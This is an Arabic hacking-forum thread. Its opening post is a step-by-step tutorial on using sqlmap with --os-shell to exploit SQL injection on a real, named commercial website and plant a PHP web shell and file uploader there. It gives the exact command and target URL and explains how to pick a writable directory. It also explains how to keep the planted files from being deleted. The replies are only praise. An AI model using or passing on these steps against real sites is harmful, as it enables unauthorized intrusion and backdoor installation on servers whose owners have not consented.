1. Mr.7nsh

    Mr.7nsh Developer

    الأنتساب:
    ‏7 مارس 2013
    المشاركات:
    54
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    [​IMG]
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    كيفكم اخواني ان شاء الله بألف خير

    ندخل في الموضوع على طوول


    [​IMG]

    معانا موضوع عن اداة sqlmap في نظام كالي لينكس

    الكل يعرف الاداه انها للحقن في ثغرات sql لكن البعض مايعرف

    ان ممكن من الاداه ترفع شل وتاخذ راحتك في السيرفر نجي للمهم

    لازم نعرف مسار مجلد عليه تصريح 777 او اذا كان السيرفر صلاحياته يوزر حدد المسار اللي يعجبك

    واهم حاجه بعد الحقن لازم ماتقفل الsqlmap لين ماترفع

    شل لان بيحذف الملفات تلقائي اللي تم حقنها في الموقع نتابع ونشوف

    عندنا الان هذا الموقع

    [CODEE]http://www.microtekusa.com/products.php?KindID=6[/CODEE]


    نكتب هذا الامر في الترمنال


    [CODEE]sqlmap -u http://www.microtekusa.com/products.php?KindID=6 --os-shell[/CODEE]

    تابع معي الشرح المصور

    [​IMG]

    يطلع لنا هذا الشكل ونختار [4] PHP (default) بكتابة الرقم 4 مثل الصوره وانتر

    كتبنا رقم 4 لان الموقع يدعم PHP كل موقع وعلى حسب البرمجه اللي شغال عليها الموقع

    [​IMG]

    الصوره الثالثه هنا تطلع لنا خيارات الاول المسار

    الافتراضي والثاني المسار اللي انت تحدده يحقن فيه الملف وانا افضل

    المسار الثاني علشان اختار المجلد اللي يكون مصرح في اغلب

    الحالات نكتب رقم 2 وانتر وشوف وش بيطلع لك

    [​IMG]

    في هالصوره الحين لازم نكتب مسار المجلد

    اللي راح يحقن فيه الملف المطلوب وانا حددت مسار

    مصرح بعد التخمين على مجلدات الموقع

    [​IMG]

    [​IMG]

    في هذي الصوره الان يقولك تم الحقن بنجاح

    وهنا الخلاصه تم حقن ملفين الملف الاول هذا هو

    tmpbxgbe.php?cmd=ls -la

    والملف الثاني ابلود

    tmpunqmq.php

    ملاحظه مهمه جدا :: شوف اخر شي بعد ماتم حقن الملفين وش مكتوب

    calling OS shell. To quit type 'x' or 'q' and press ENTER

    يعني اذا تم كتابة حرف X او حرق q راح يتم حذف الملفين

    تلقائي وبكذا بعض الشباب راح يقول ماينفع الموقع لم يتم الحقن لازم

    تخليه مثل ماهو من غير ماتكتب اي شي لين ماترفع الشل

    الخاص فيك في الموقع وبعدها اكتب اللي تبي في الترمنال

    [​IMG]

    [​IMG]

    [​IMG]
     
  2. HaMaM-HaCkEr

    HaMaM-HaCkEr DeveloPer Plus

    الأنتساب:
    ‏22 نوفمبر 2012
    المشاركات:
    117
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    بارك الله فيك أخي الكريم ماقصرت​
     
  3. PROCESSEUR.DZ

    PROCESSEUR.DZ Developer

    الأنتساب:
    ‏16 ديسمبر 2011
    المشاركات:
    30
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الوظيفة:
    مصلح حواسب
    الإقامة:
    {عقلية DZ}
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    بارك الله فيك أخي الفاضل

    و يعطيك الصحة
     
  4. k!lwa s&rian ro0t

    k!lwa s&rian ro0t مراقب عآم

    الأنتساب:
    ‏3 أغسطس 2014
    المشاركات:
    742
    الإعجابات المتلقاة:
    1,233
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    رائع اخي بارك الله فيك !
     
  5. (أوسكار)

    (أوسكار) Developer

    الأنتساب:
    ‏5 نوفمبر 2012
    المشاركات:
    28
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    وعليكم السلام

    مشاء الله شرح واضح وكافي يالغالي

    مآقصرت
     
  6. M!st3я Y0u

    M!st3я Y0u Developer

    الأنتساب:
    ‏19 ديسمبر 2011
    المشاركات:
    76
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    الوظيفة:
    تـلـمـيـذ
    الإقامة:
    TuNiSiA
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    شكراً جزيلاً اخي ..

    بارك الله فيك و جزاك الله خيراً .. :{2}:
     
  7. security alqasem

    security alqasem موقوف لمخالفة الشروط

    الأنتساب:
    ‏26 مايو 2014
    المشاركات:
    54
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    المخالفات
    3
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    عاشت ايدك حبي شرح حلو
     
  8. black.boy

    black.boy Developer

    الأنتساب:
    ‏29 مايو 2012
    المشاركات:
    43
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    iran
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    يعطيك آلعآفيه..~!

    آستمرِ..~!
     
  9. V!rus-MarOc

    V!rus-MarOc Developer

    الأنتساب:
    ‏26 ديسمبر 2011
    المشاركات:
    55
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    8
    الوظيفة:
    Hacker
    الإقامة:
    ©MAЯΘ
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    السلام عليكم
    بارك الله فيك أخي
    لا هنت أخي :{2}:
     
  10. Elite Trojan

    Elite Trojan Developer

    الأنتساب:
    ‏20 ابريل 2012
    المشاركات:
    68
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    يعطيك العافية على الموضوع ,

    واصل يا مبدع [​IMG]
     

مشاركة هذه الصفحة